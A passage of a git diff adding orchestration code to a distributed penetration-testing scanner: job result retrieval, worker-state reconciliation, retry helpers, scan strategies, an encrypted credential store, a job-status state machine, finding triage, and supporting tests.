entry in passes], + "job_status": job_status, + } + else: + target_pass = passes[-1] + + llm_analysis = target_pass.get("llm_analysis") + if not llm_analysis: + return { + "error": "No LLM analysis available for this pass", + "job_id": job_id, + "pass_nr": target_pass.get("pass_nr"), + "llm_failed": target_pass.get("llm_failed", False), + "job_status": job_status, + } + + job_config = archive.get("job_config", {}) or {} + target_value = job_config.get("target") or job_specs.get("target") + return { + "job_id": job_id, + "pass_nr": target_pass.get("pass_nr"), + "completed_at": target_pass.get("date_completed"), + "report_cid": target_pass.get("report_cid"), + "target": target_value, + "num_workers": len(target_pass.get("worker_reports", {}) or {}), + "total_passes": len(passes), + "analysis": llm_analysis, + "quick_summary": target_pass.get("quick_summary"), + } + + pass_reports = job_specs.get("pass_reports", []) + if not pass_reports: + if job_status == "RUNNING": + return {"error": "Job still running, no passes completed yet", "job_id": job_id, "job_status": job_status} + return {"error": "No pass reports available for this job", "job_id": job_id, "job_status": job_status} + + if pass_nr is not None: + target_pass = next((entry for entry in pass_reports if entry.get("pass_nr") == pass_nr), None) + if not target_pass: + return { + "error": f"Pass {pass_nr} not found in history", + "job_id": job_id, + "available_passes": [entry.get("pass_nr") for entry in pass_reports], + } + else: + target_pass = pass_reports[-1] + + report_cid = target_pass.get("report_cid") + if not report_cid: + return { + "error": "No pass report CID available for this pass", + "job_id": job_id, + "pass_nr": target_pass.get("pass_nr"), + "job_status": job_status, + } + + try: + pass_data = owner.r1fs.get_json(report_cid) + if pass_data is None: + return {"error": "Pass report not found in R1FS", "cid": report_cid, "job_id": job_id} + + llm_analysis = pass_data.get("llm_analysis") + if not 
llm_analysis: + return { + "error": "No LLM analysis available for this pass", + "job_id": job_id, + "pass_nr": target_pass.get("pass_nr"), + "llm_failed": pass_data.get("llm_failed", False), + "job_status": job_status, + } + + return { + "job_id": job_id, + "pass_nr": target_pass.get("pass_nr"), + "completed_at": pass_data.get("date_completed"), + "report_cid": report_cid, + "target": job_specs.get("target"), + "num_workers": len(job_specs.get("workers", {})), + "total_passes": len(pass_reports), + "analysis": llm_analysis, + "quick_summary": pass_data.get("quick_summary"), + } + except Exception as e: + return {"error": str(e), "cid": report_cid, "job_id": job_id} + + +def get_job_progress(owner, job_id: str): + """ + Return real-time progress for all workers in the given job. + """ + all_progress = _job_repo(owner).list_live_progress() or {} + + job_specs = _job_repo(owner).get_job(job_id) + status = None + scan_type = None + result = {} + if isinstance(job_specs, dict): + status = job_specs.get("job_status") + scan_type = job_specs.get("scan_type") + result = reconcile_job_workers(owner, job_specs, live_payloads=all_progress) + else: + prefix = f"{job_id}:" + for key, value in all_progress.items(): + if key.startswith(prefix) and value is not None: + worker_addr = key[len(prefix):] + result[worker_addr] = value + return {"job_id": job_id, "status": status, "scan_type": scan_type, "workers": result} + + +def list_network_jobs(owner): + """ + Return a normalized network-job listing from CStore. 
+ """ + raw_network_jobs = _job_repo(owner).list_jobs() + normalized_jobs = {} + for job_key, job_spec in raw_network_jobs.items(): + normalized_key, normalized_spec = owner._normalize_job_record(job_key, job_spec) + if normalized_key and normalized_spec: + if normalized_spec.get("job_cid"): + normalized_jobs[normalized_key] = normalized_spec + continue + + normalized_jobs[normalized_key] = { + "job_id": normalized_spec.get("job_id"), + "job_status": normalized_spec.get("job_status"), + "target": normalized_spec.get("target"), + "scan_type": normalized_spec.get("scan_type", "network"), + "target_url": normalized_spec.get("target_url", ""), + "task_name": normalized_spec.get("task_name"), + "risk_score": normalized_spec.get("risk_score", 0), + "run_mode": normalized_spec.get("run_mode"), + "start_port": normalized_spec.get("start_port"), + "end_port": normalized_spec.get("end_port"), + "date_created": normalized_spec.get("date_created"), + "launcher": normalized_spec.get("launcher"), + "launcher_alias": normalized_spec.get("launcher_alias"), + "worker_count": len(normalized_spec.get("workers", {}) or {}), + "pass_count": len(normalized_spec.get("pass_reports", []) or []), + "job_pass": normalized_spec.get("job_pass", 1), + } + return normalized_jobs + + +def list_local_jobs(owner): + """ + Return jobs currently running on the local node. 
+ """ + return { + job_id: owner._get_job_status(job_id) + for job_id, local_workers in owner.scan_jobs.items() + } diff --git a/extensions/business/cybersec/red_mesh/services/reconciliation.py b/extensions/business/cybersec/red_mesh/services/reconciliation.py new file mode 100644 index 00000000..dc28f7d9 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/services/reconciliation.py @@ -0,0 +1,158 @@ +from ..models import WorkerProgress +from .config import resolve_config_block + +DEFAULT_DISTRIBUTED_JOB_RECONCILIATION_CONFIG = { + "STARTUP_TIMEOUT": 45.0, + "STALE_TIMEOUT": 120.0, + "STALE_GRACE": 30.0, + "MAX_REANNOUNCE_ATTEMPTS": 3, +} + + +def _safe_int(value, default): + try: + return int(value) + except (TypeError, ValueError): + return default + + +def _safe_float(value, default=None): + try: + return float(value) + except (TypeError, ValueError): + return default + + +def get_distributed_job_reconciliation_config(owner): + """Return normalized distributed-job reconciliation config.""" + def _normalize(merged, defaults): + startup_timeout = _safe_float( + merged.get("STARTUP_TIMEOUT"), + defaults["STARTUP_TIMEOUT"], + ) + if startup_timeout is None or startup_timeout <= 0: + startup_timeout = defaults["STARTUP_TIMEOUT"] + + stale_timeout = _safe_float( + merged.get("STALE_TIMEOUT"), + defaults["STALE_TIMEOUT"], + ) + if stale_timeout is None or stale_timeout <= 0: + stale_timeout = defaults["STALE_TIMEOUT"] + + stale_grace = _safe_float( + merged.get("STALE_GRACE"), + defaults["STALE_GRACE"], + ) + if stale_grace is None or stale_grace < 0: + stale_grace = defaults["STALE_GRACE"] + + max_reannounce_attempts = _safe_int( + merged.get("MAX_REANNOUNCE_ATTEMPTS"), + defaults["MAX_REANNOUNCE_ATTEMPTS"], + ) + if max_reannounce_attempts < 0: + max_reannounce_attempts = defaults["MAX_REANNOUNCE_ATTEMPTS"] + + return { + "STARTUP_TIMEOUT": startup_timeout, + "STALE_TIMEOUT": stale_timeout, + "STALE_GRACE": stale_grace, + "MAX_REANNOUNCE_ATTEMPTS": 
max_reannounce_attempts, + } + + return resolve_config_block( + owner, + "DISTRIBUTED_JOB_RECONCILIATION", + DEFAULT_DISTRIBUTED_JOB_RECONCILIATION_CONFIG, + normalizer=_normalize, + ) + + +def _matched_live_progress(job_id, worker_addr, pass_nr, assignment_revision, live_payloads): + key = f"{job_id}:{worker_addr}" + payload = (live_payloads or {}).get(key) + if not isinstance(payload, dict): + return None, None + try: + live = WorkerProgress.from_dict(payload) + except (KeyError, TypeError, ValueError): + return None, "malformed_live" + if live.job_id != job_id: + return None, "job_mismatch" + if live.pass_nr != pass_nr: + return None, "pass_mismatch" + if live.assignment_revision_seen != assignment_revision: + return None, "revision_mismatch" + return live, None + + +def reconcile_job_workers(owner, job_specs, *, live_payloads=None, now=None): + """ + Merge launcher-owned worker assignments with worker-owned :live state. + + Returned worker entries always include launcher assignment metadata and a + derived ``worker_state``. Matched ``:live`` payloads are folded into the + same per-worker dict so API consumers and launcher logic interpret state + through one canonical path. 
+ """ + if not isinstance(job_specs, dict): + return {} + + job_id = job_specs.get("job_id") + pass_nr = _safe_int(job_specs.get("job_pass", 1), 1) + workers = job_specs.get("workers") or {} + live_payloads = live_payloads or {} + stale_timeout = get_distributed_job_reconciliation_config(owner)["STALE_TIMEOUT"] + if now is None: + time_fn = getattr(owner, "time", None) + if callable(time_fn): + now = _safe_float(time_fn(), None) + + reconciled = {} + for worker_addr, raw_worker_entry in workers.items(): + worker_entry = dict(raw_worker_entry or {}) + assignment_revision = _safe_int(worker_entry.get("assignment_revision", 1), 1) + live, ignored_reason = _matched_live_progress( + job_id, + worker_addr, + pass_nr, + assignment_revision, + live_payloads, + ) + + state = "unseen" + if worker_entry.get("terminal_reason") == "unreachable": + state = "unreachable" + elif worker_entry.get("finished"): + state = "failed" if worker_entry.get("error") else "finished" + elif live is not None: + if live.error: + state = "failed" + elif live.finished: + state = "finished" + else: + last_seen_at = _safe_float(live.last_seen_at, _safe_float(live.updated_at, None)) + if now is not None and last_seen_at is not None and now - last_seen_at > stale_timeout: + state = "stale" + elif live.started_at: + state = "started" if _safe_float(live.progress, 0.0) <= 0 else "active" + + payload = dict(worker_entry) + payload["worker_addr"] = worker_addr + payload["pass_nr"] = pass_nr + payload["assignment_revision"] = assignment_revision + payload["worker_state"] = state + + if live is not None: + payload.update(live.to_dict()) + elif ignored_reason: + payload["ignored_live_reason"] = ignored_reason + if ignored_reason == "malformed_live" and hasattr(owner, "P"): + owner.P( + f"[LIVE] Ignoring malformed live payload for job_id={job_id} worker={worker_addr}", + color='y', + ) + + reconciled[worker_addr] = payload + return reconciled diff --git 
def _safe_log(owner, message: str, color: str = None):
    # Log through the host's P() printer when one exists; no-op otherwise.
    printer = getattr(owner, "P", None)
    if not callable(printer):
        return
    if color is None:
        printer(message)
    else:
        printer(message, color=color)


def _safe_audit(owner, event: str, payload: dict):
    # Emit an audit event only when the host exposes _log_audit_event.
    emitter = getattr(owner, "_log_audit_event", None)
    if callable(emitter):
        emitter(event, payload)


def run_bounded_retry(owner, action: str, attempts: int, operation, is_success=None):
    """Run a side-effecting operation with bounded retries and observable logs."""
    # At least one attempt always happens, even for attempts <= 0 / None.
    total = max(int(attempts or 1), 1)
    check = is_success if is_success is not None else (lambda value: bool(value))
    outcome = None
    failure = None

    attempt = 0
    while attempt < total:
        attempt += 1
        try:
            outcome = operation()
        except Exception as exc:
            failure = exc
            outcome = None
            _safe_log(owner, f"[RETRY] {action} attempt {attempt}/{total} failed: {exc}", color='y')
        else:
            if check(outcome):
                # Recovery after at least one failed attempt is worth noting.
                if attempt > 1:
                    _safe_log(owner, f"[RETRY] {action} succeeded on attempt {attempt}/{total}")
                    _safe_audit(owner, "retry_recovered", {
                        "action": action,
                        "attempt": attempt,
                        "attempts": total,
                    })
                return outcome
            _safe_log(owner, f"[RETRY] {action} attempt {attempt}/{total} did not meet success criteria", color='y')

        if attempt < total:
            _safe_audit(owner, "retry_attempt", {
                "action": action,
                "attempt": attempt,
                "attempts": total,
            })

    # All attempts used without meeting the success criterion.
    report = {"action": action, "attempts": total}
    if failure is not None:
        report["error"] = str(failure)
    _safe_audit(owner, "retry_exhausted", report)
    return outcome
from dataclasses import dataclass

from ..constants import ScanType
from ..graybox.worker import GrayboxLocalWorker
from ..worker import PentestLocalWorker


@dataclass(frozen=True)
class ScanStrategy:
    """Immutable per-scan-type bundle: worker class plus catalog categories."""
    scan_type: ScanType
    worker_cls: type
    catalog_categories: tuple[str, ...]


# Registry keyed by ScanType; extend here when new scan kinds are added.
SCAN_STRATEGIES = {
    ScanType.NETWORK: ScanStrategy(
        scan_type=ScanType.NETWORK,
        worker_cls=PentestLocalWorker,
        catalog_categories=("service", "web", "correlation"),
    ),
    ScanType.WEBAPP: ScanStrategy(
        scan_type=ScanType.WEBAPP,
        worker_cls=GrayboxLocalWorker,
        catalog_categories=("graybox",),
    ),
}


def coerce_scan_type(scan_type=None):
    """Normalize optional scan-type input to ScanType or None."""
    # None / "" / "all" all mean "no specific type requested".
    if scan_type is None or scan_type == "" or scan_type == "all":
        return None
    return scan_type if isinstance(scan_type, ScanType) else ScanType(str(scan_type))


def get_scan_strategy(scan_type=None, default=ScanType.NETWORK) -> ScanStrategy:
    """Resolve a single strategy; unspecified input falls back to *default*."""
    key = coerce_scan_type(scan_type)
    if key is None:
        key = default
    return SCAN_STRATEGIES[key]


def iter_scan_strategies(scan_type=None):
    """Return (scan_type, strategy) pairs — one pair when filtered, else all."""
    key = coerce_scan_type(scan_type)
    if key is None:
        return list(SCAN_STRATEGIES.items())
    return [(key, SCAN_STRATEGIES[key])]
"_get_artifact_repository", None) + if callable(getter): + return getter(owner) + return ArtifactRepository(owner) + + +class R1fsSecretStore: + """Secret-store adapter backed by a protected R1FS JSON object.""" + + def __init__(self, owner): + self.owner = owner + + @staticmethod + def _normalize_secret_key(value): + if not isinstance(value, str): + return "" + value = value.strip() + return value if len(value) >= 8 else "" + + def _get_secret_store_key(self) -> str: + candidates = [ + os.environ.get("REDMESH_SECRET_STORE_KEY", ""), + getattr(self.owner, "cfg_redmesh_secret_store_key", ""), + getattr(self.owner, "cfg_comms_host_key", ""), + get_attestation_config(self.owner)["PRIVATE_KEY"], + ] + for candidate in candidates: + key = self._normalize_secret_key(candidate) + if key: + return key + return "" + + def save_graybox_credentials(self, job_id: str, payload: dict) -> str: + secret_key = self._get_secret_store_key() + if not secret_key: + self.owner.P( + "No strong RedMesh secret-store key is configured. 
" + "Graybox launch credentials cannot be persisted safely.", + color='r', + ) + return "" + secret_doc = { + "kind": "redmesh_graybox_credentials", + "job_id": job_id, + "storage_mode": "encrypted_r1fs_json_v1", + "payload": payload, + } + return _artifact_repo(self.owner).put_json(secret_doc, show_logs=False, secret=secret_key) + + def load_graybox_credentials(self, secret_ref: str) -> dict | None: + if not secret_ref: + return None + repo = _artifact_repo(self.owner) + secret_key = self._get_secret_store_key() + secret_doc = None + if secret_key: + secret_doc = repo.get_json(secret_ref, secret=secret_key) + if not isinstance(secret_doc, dict): + secret_doc = repo.get_json(secret_ref) + if not isinstance(secret_doc, dict): + self.owner.P(f"Failed to fetch graybox secret payload from R1FS (CID: {secret_ref})", color='r') + return None + payload = secret_doc.get("payload") + if not isinstance(payload, dict): + self.owner.P(f"Invalid graybox secret payload for ref {secret_ref}", color='r') + return None + return payload + + def delete_secret(self, secret_ref: str) -> bool: + if not secret_ref: + return True + try: + return bool(_artifact_repo(self.owner).delete(secret_ref, show_logs=False, raise_on_error=False)) + except Exception as exc: + self.owner.P(f"Failed to delete graybox secret ref {secret_ref}: {exc}", color='y') + return False + + +def _blank_graybox_secret_fields(config_dict: dict) -> dict: + sanitized = dict(config_dict) + sanitized["official_username"] = "" + sanitized["official_password"] = "" + sanitized["regular_username"] = "" + sanitized["regular_password"] = "" + sanitized.pop("weak_candidates", None) + return sanitized + + +def _coerce_job_config_dict(config_dict: dict) -> dict: + raw = deepcopy(config_dict or {}) + raw.setdefault("target", raw.get("target_url", "")) + raw.setdefault("start_port", 0) + raw.setdefault("end_port", 0) + return JobConfig.from_dict(raw).to_dict() + + +def build_graybox_secret_payload( + *, + official_username="", + 
official_password="", + regular_username="", + regular_password="", + weak_candidates=None, +): + return { + "official_username": official_username or "", + "official_password": official_password or "", + "regular_username": regular_username or "", + "regular_password": regular_password or "", + "weak_candidates": list(weak_candidates) if isinstance(weak_candidates, list) else weak_candidates, + } + + +def persist_job_config_with_secrets( + owner, + *, + job_id: str, + config_dict: dict, +): + """ + Persist durable job config with secrets split into a separate secret object. + + Returns + ------- + tuple[dict, str] + Persisted config dict and resulting job_config_cid. + """ + persisted_config = _coerce_job_config_dict(config_dict) + scan_type = persisted_config.get("scan_type", "network") + if scan_type == "webapp": + payload = build_graybox_secret_payload( + official_username=persisted_config.get("official_username", ""), + official_password=persisted_config.get("official_password", ""), + regular_username=persisted_config.get("regular_username", ""), + regular_password=persisted_config.get("regular_password", ""), + weak_candidates=persisted_config.get("weak_candidates"), + ) + has_secret_payload = any([ + payload["official_username"], + payload["official_password"], + payload["regular_username"], + payload["regular_password"], + payload["weak_candidates"], + ]) + if has_secret_payload: + store = R1fsSecretStore(owner) + secret_ref = store.save_graybox_credentials(job_id, payload) + if not secret_ref: + owner.P("Failed to persist graybox secret payload in R1FS — aborting launch", color='r') + return persisted_config, "" + persisted_config["secret_ref"] = secret_ref + persisted_config["has_regular_credentials"] = bool(payload["regular_username"] or payload["regular_password"]) + persisted_config["has_weak_candidates"] = bool(payload["weak_candidates"]) + persisted_config = _blank_graybox_secret_fields(persisted_config) + + job_config_cid = 
_artifact_repo(owner).put_job_config(persisted_config, show_logs=False) + return persisted_config, job_config_cid + + +def resolve_job_config_secrets(owner, config_dict: dict, include_secret_metadata: bool = True) -> dict: + """ + Resolve secret_ref into runtime-only inline credentials for worker execution. + + Backward compatibility: + - configs without secret_ref are returned unchanged + - legacy inline secrets remain supported + """ + resolved = _coerce_job_config_dict(config_dict) + secret_ref = resolved.get("secret_ref") + if not secret_ref: + return resolved + + payload = R1fsSecretStore(owner).load_graybox_credentials(secret_ref) + if not payload: + return resolved + + resolved.update({ + "official_username": payload.get("official_username", ""), + "official_password": payload.get("official_password", ""), + "regular_username": payload.get("regular_username", ""), + "regular_password": payload.get("regular_password", ""), + "weak_candidates": payload.get("weak_candidates"), + }) + if not include_secret_metadata: + resolved.pop("secret_ref", None) + return resolved + + +def collect_secret_refs_from_job_config(job_config: dict) -> list[str]: + secret_ref = (job_config or {}).get("secret_ref") + if isinstance(secret_ref, str) and secret_ref: + return [secret_ref] + return [] diff --git a/extensions/business/cybersec/red_mesh/services/state_machine.py b/extensions/business/cybersec/red_mesh/services/state_machine.py new file mode 100644 index 00000000..03e10b64 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/services/state_machine.py @@ -0,0 +1,72 @@ +from ..constants import ( + JOB_STATUS_ANALYZING, + JOB_STATUS_COLLECTING, + JOB_STATUS_FINALIZED, + JOB_STATUS_FINALIZING, + JOB_STATUS_RUNNING, + JOB_STATUS_SCHEDULED_FOR_STOP, + JOB_STATUS_STOPPED, +) + + +JOB_STATUS_TRANSITIONS = { + JOB_STATUS_RUNNING: { + JOB_STATUS_COLLECTING, + JOB_STATUS_SCHEDULED_FOR_STOP, + JOB_STATUS_STOPPED, + }, + JOB_STATUS_SCHEDULED_FOR_STOP: { + JOB_STATUS_COLLECTING, + 
# Directed graph of legal status transitions; a missing edge means the
# transition is rejected by set_job_status().
JOB_STATUS_TRANSITIONS = {
    JOB_STATUS_RUNNING: {
        JOB_STATUS_COLLECTING,
        JOB_STATUS_SCHEDULED_FOR_STOP,
        JOB_STATUS_STOPPED,
    },
    JOB_STATUS_SCHEDULED_FOR_STOP: {
        JOB_STATUS_COLLECTING,
        JOB_STATUS_STOPPED,
    },
    JOB_STATUS_COLLECTING: {
        JOB_STATUS_ANALYZING,
        JOB_STATUS_FINALIZING,
        JOB_STATUS_STOPPED,
    },
    JOB_STATUS_ANALYZING: {
        JOB_STATUS_FINALIZING,
        JOB_STATUS_STOPPED,
    },
    JOB_STATUS_FINALIZING: {
        # FINALIZING -> RUNNING supports continuous/multi-pass jobs that
        # start another pass after finalizing the current one.
        JOB_STATUS_RUNNING,
        JOB_STATUS_FINALIZED,
        JOB_STATUS_STOPPED,
    },
    # Terminal states have no outgoing edges.
    JOB_STATUS_FINALIZED: set(),
    JOB_STATUS_STOPPED: set(),
}

# Statuses that never transition again.
TERMINAL_JOB_STATUSES = {
    JOB_STATUS_FINALIZED,
    JOB_STATUS_STOPPED,
}

# Finalization-pipeline statuses between RUNNING and a terminal state.
INTERMEDIATE_JOB_STATUSES = {
    JOB_STATUS_COLLECTING,
    JOB_STATUS_ANALYZING,
    JOB_STATUS_FINALIZING,
}


def can_transition_job_status(current_status: str, next_status: str) -> bool:
    """Return True when *next_status* is reachable from *current_status* (self-loops allowed)."""
    if current_status == next_status:
        return True
    allowed = JOB_STATUS_TRANSITIONS.get(current_status, set())
    return next_status in allowed


def set_job_status(job_specs: dict, next_status: str) -> dict:
    """Validate and apply a status change in place; raises ValueError on an illegal move."""
    # A record with no job_status is treated as RUNNING.
    current_status = job_specs.get("job_status", JOB_STATUS_RUNNING)
    if not can_transition_job_status(current_status, next_status):
        raise ValueError(f"Invalid job status transition: {current_status} -> {next_status}")
    job_specs["job_status"] = next_status
    return job_specs


def is_terminal_job_status(status: str) -> bool:
    """Return True for statuses that never transition again."""
    return status in TERMINAL_JOB_STATUSES


def is_intermediate_job_status(status: str) -> bool:
    """Return True for finalization-pipeline statuses (collecting/analyzing/finalizing)."""
    return status in INTERMEDIATE_JOB_STATUSES
def _artifact_repo(owner):
    # Prefer the host class's repository factory when one is defined;
    # otherwise construct an ArtifactRepository directly around the owner.
    getter = getattr(type(owner), "_get_artifact_repository", None)
    if callable(getter):
        return getter(owner)
    return ArtifactRepository(owner)


def _archive_contains_finding(archive: dict, finding_id: str) -> bool:
    """Return True when any pass in the archive carries the given finding_id."""
    for pass_report in archive.get("passes", []) or []:
        for finding in pass_report.get("findings", []) or []:
            if isinstance(finding, dict) and finding.get("finding_id") == finding_id:
                return True
    return False


def _merge_triage_into_archive_dict(archive: dict, triage_map: dict) -> dict:
    """Return a deep copy of *archive* with triage states attached to matching findings."""
    merged = deepcopy(archive)
    # Attach triage to every per-pass finding...
    for pass_report in merged.get("passes", []) or []:
        for finding in pass_report.get("findings", []) or []:
            if not isinstance(finding, dict):
                continue
            triage = triage_map.get(finding.get("finding_id"))
            if triage:
                finding["triage"] = triage
    # ...and to the UI aggregate's top findings, when present.
    ui = merged.get("ui_aggregate")
    if isinstance(ui, dict):
        for finding in ui.get("top_findings", []) or []:
            if not isinstance(finding, dict):
                continue
            triage = triage_map.get(finding.get("finding_id"))
            if triage:
                finding["triage"] = triage
    return merged


def get_job_triage(owner, job_id: str, finding_id: str = ""):
    """
    Return triage state for a whole job, or for one finding (with its audit trail)
    when *finding_id* is given.
    """
    triage_map = _job_repo(owner).list_job_triage(job_id)
    if finding_id:
        state = triage_map.get(finding_id)
        audit = _job_repo(owner).get_finding_triage_audit(job_id, finding_id)
        if state is None:
            return {"job_id": job_id, "finding_id": finding_id, "found": False, "triage": None, "audit": audit}
        return {"job_id": job_id, "finding_id": finding_id, "found": True, "triage": state, "audit": audit}
    return {"job_id": job_id, "triage": triage_map}


def update_finding_triage(owner, job_id: str, finding_id: str, status: str, note: str = "", actor: str = "", review_at: float = 0):
    """
    Set the triage status of an archived finding and append an audit entry.

    Returns the stored state and audit payloads, or an ``{"error": ...}`` dict
    when validation or archive resolution fails. Triage is only allowed once
    the job is archived (has a ``job_cid``).
    """
    if status not in VALID_TRIAGE_STATUSES:
        return {
            "error": "validation_error",
            "message": f"Unsupported triage status: {status}. Allowed: {sorted(VALID_TRIAGE_STATUSES)}",
        }

    job_specs = owner._get_job_from_cstore(job_id)
    if not job_specs:
        return {"error": "not_found", "message": f"Job {job_id} not found."}
    if not job_specs.get("job_cid"):
        return {"error": "not_available", "message": f"Job {job_id} is still running (triage requires archived findings)."}

    # The finding must exist in the archived payload before triage is stored.
    archive = _artifact_repo(owner).get_archive(job_specs)
    if not isinstance(archive, dict):
        return {"error": "fetch_failed", "message": f"Failed to fetch archive for job {job_id}."}
    if not _archive_contains_finding(archive, finding_id):
        return {"error": "not_found", "message": f"Finding {finding_id} not found in archived job {job_id}."}

    triage_state = FindingTriageState(
        job_id=job_id,
        finding_id=finding_id,
        status=status,
        note=note or "",
        actor=actor or "",
        updated_at=owner.time(),
        # review_at of 0/None means "no scheduled review".
        review_at=review_at or None,
    )
    repo = _job_repo(owner)
    # Persist the new state first, then the append-only audit entry.
    state_payload = repo.put_finding_triage(triage_state)
    audit_payload = repo.append_finding_triage_audit(FindingTriageAuditEntry(
        job_id=job_id,
        finding_id=finding_id,
        status=status,
        note=note or "",
        actor=actor or "",
        timestamp=owner.time(),
    ))
    if hasattr(owner, "_log_audit_event"):
        owner._log_audit_event("finding_triage_updated", {
            "job_id": job_id,
            "finding_id": finding_id,
            "status": status,
            "actor": actor or "",
        })
    return {
        "job_id": job_id,
        "finding_id": finding_id,
        "triage": state_payload,
        "audit": audit_payload,
    }


def get_job_archive_with_triage(owner, job_id: str):
    """
    Fetch the archived payload for a finalized job and merge stored triage
    states into its findings. Returns ``{"error": ...}`` dicts for missing,
    still-running, unfetchable, version-unsupported, or mismatched archives.
    """
    job_specs = owner._get_job_from_cstore(job_id)
    if not job_specs:
        return {"error": "not_found", "message": f"Job {job_id} not found."}

    job_cid = job_specs.get("job_cid")
    if not job_cid:
        return {"error": "not_available", "message": f"Job {job_id} is still running (no archive yet)."}

    try:
        archive = _artifact_repo(owner).get_archive_model(job_specs)
        if archive is None:
            return {"error": "fetch_failed", "message": f"Failed to fetch archive from R1FS (CID: {job_cid})."}
        archive = archive.to_dict()
    except ValueError as exc:
        # get_archive_model raises ValueError for unsupported archive versions.
        return {
            "error": "unsupported_archive_version",
            "message": str(exc),
            "job_id": job_id,
            "job_cid": job_cid,
        }

    # Integrity gate: the archive must describe the job that was requested.
    if archive.get("job_id") != job_id:
        owner.P(
            f"[INTEGRITY] Archive CID {job_cid} has job_id={archive.get('job_id')}, expected {job_id}",
            color='r'
        )
        return {"error": "integrity_mismatch", "message": "Archive job_id does not match requested job_id."}

    triage_map = _job_repo(owner).list_job_triage(job_id)
    merged_archive = _merge_triage_into_archive_dict(archive, triage_map)
    return {"job_id": job_id, "archive": merged_archive, "triage": triage_map}
+ +## Repositories + +- `test_repositories.py` + +## Launch and Orchestration Services + +- `test_launch_service.py` +- `test_state_machine.py` +- `test_api.py` +- `test_integration.py` +- `test_regressions.py` + +## Workers and Graybox Runtime + +- `test_base_worker.py` +- `test_worker.py` +- `test_auth.py` +- `test_discovery.py` +- `test_safety.py` +- `test_target_config.py` + +## Probe Families + +- `test_probes.py` +- `test_probes_access.py` +- `test_probes_business.py` +- `test_probes_injection.py` +- `test_probes_misconfig.py` + +## Normalization and Contracts + +- `test_normalization.py` +- `test_graybox_finding.py` +- `test_jobconfig_webapp.py` +- `test_contracts.py` +- `test_hardening.py` + +## Suggested Layered Runs + +```bash +PYTHONPATH=/home/vitalii/remote-dev/repos/edge_node pytest -q extensions/business/cybersec/red_mesh/tests/test_repositories.py +PYTHONPATH=/home/vitalii/remote-dev/repos/edge_node pytest -q extensions/business/cybersec/red_mesh/tests/test_launch_service.py extensions/business/cybersec/red_mesh/tests/test_api.py extensions/business/cybersec/red_mesh/tests/test_integration.py extensions/business/cybersec/red_mesh/tests/test_regressions.py +PYTHONPATH=/home/vitalii/remote-dev/repos/edge_node pytest -q extensions/business/cybersec/red_mesh/tests/test_worker.py extensions/business/cybersec/red_mesh/tests/test_auth.py extensions/business/cybersec/red_mesh/tests/test_discovery.py extensions/business/cybersec/red_mesh/tests/test_safety.py +PYTHONPATH=/home/vitalii/remote-dev/repos/edge_node pytest -q extensions/business/cybersec/red_mesh/tests/test_normalization.py extensions/business/cybersec/red_mesh/tests/test_graybox_finding.py extensions/business/cybersec/red_mesh/tests/test_contracts.py +``` diff --git a/extensions/business/cybersec/red_mesh/tests/__init__.py b/extensions/business/cybersec/red_mesh/tests/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/extensions/business/cybersec/red_mesh/tests/conftest.py 
import json
import sys
import struct
import unittest
from unittest.mock import MagicMock, patch

from extensions.business.cybersec.red_mesh.worker import PentestLocalWorker

from xperimental.utils import color_print

# When True, DummyOwner mirrors captured messages to the console with color
# for manual debugging runs; keep False for CI.
MANUAL_RUN = False



class DummyOwner:
    """Minimal stand-in for the plugin host: records every P() message."""

    def __init__(self):
        # All messages passed to P() are captured here for assertions.
        self.messages = []

    def P(self, message, **kwargs):
        # Always capture; optionally echo with severity-based coloring.
        self.messages.append(message)
        if MANUAL_RUN:
            if "VULNERABILITY" in message:
                color = 'r'
            elif any(x in message for x in ["WARNING", "findings:"]):
                color = 'y'
            else:
                color = 'd'
            color_print(f"[DummyOwner] {message}", color=color)
        return


def mock_plugin_modules():
    """Install mock modules so pentester_api_01 can be imported without naeural_core."""
    if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules:
        return  # Already imported successfully

    # Build a real class to avoid metaclass conflicts
    def endpoint_decorator(*args, **kwargs):
        # Supports both bare @endpoint and parameterized @endpoint(...) usage.
        if args and callable(args[0]):
            return args[0]
        def wrapper(fn):
            return fn
        return wrapper

    class FakeBasePlugin:
        CONFIG = {'VALIDATION_RULES': {}}
        endpoint = staticmethod(endpoint_decorator)

    mock_module = MagicMock()
    mock_module.FastApiWebAppPlugin = FakeBasePlugin

    modules_to_mock = {
        'naeural_core': MagicMock(),
        'naeural_core.business': MagicMock(),
        'naeural_core.business.default': MagicMock(),
        'naeural_core.business.default.web_app': MagicMock(),
        'naeural_core.business.default.web_app.fast_api_web_app': mock_module,
    }
    for mod_name, mod in modules_to_mock.items():
        # setdefault keeps any module that was already genuinely importable.
        sys.modules.setdefault(mod_name, mod)
import json
import sys
import struct
import unittest
from unittest.mock import MagicMock, patch

from extensions.business.cybersec.red_mesh.constants import JOB_ARCHIVE_VERSION, MAX_CONTINUOUS_PASSES
from extensions.business.cybersec.red_mesh.models import CStoreJobRunning

from .conftest import DummyOwner, MANUAL_RUN, PentestLocalWorker, color_print, mock_plugin_modules


class TestPhase1ConfigCID(unittest.TestCase):
    """Phase 1: Job Config CID — extract static config from CStore to R1FS."""

    def test_config_cid_roundtrip(self):
        """JobConfig.from_dict(config.to_dict()) preserves all fields."""
        # Imported inside the test so module import does not require the model.
        from extensions.business.cybersec.red_mesh.models import JobConfig

        # Every optional field is populated to exercise full serialization.
        original = JobConfig(
            target="example.com",
            start_port=1,
            end_port=1024,
            exceptions=[22, 80],
            distribution_strategy="SLICE",
            port_order="SHUFFLE",
            nr_local_workers=4,
            enabled_features=["http_headers", "sql_injection"],
            excluded_features=["brute_force"],
            run_mode="SINGLEPASS",
            scan_min_delay=0.1,
            scan_max_delay=0.5,
            ics_safe_mode=True,
            redact_credentials=False,
            scanner_identity="test-scanner",
            scanner_user_agent="RedMesh/1.0",
            task_name="Test Scan",
            task_description="A test scan",
            monitor_interval=300,
            selected_peers=["peer1", "peer2"],
            created_by_name="tester",
            created_by_id="user-123",
            authorized=True,
        )
        d = original.to_dict()
        restored = JobConfig.from_dict(d)
        self.assertEqual(original, restored)

    def test_config_to_dict_has_required_fields(self):
        """to_dict() includes target, start_port, end_port, run_mode."""
        from extensions.business.cybersec.red_mesh.models import JobConfig

        config = JobConfig(
            target="10.0.0.1",
            start_port=1,
            end_port=65535,
            exceptions=[],
            distribution_strategy="SLICE",
            port_order="SEQUENTIAL",
            nr_local_workers=2,
            enabled_features=[],
            excluded_features=[],
            run_mode="CONTINUOUS_MONITORING",
        )
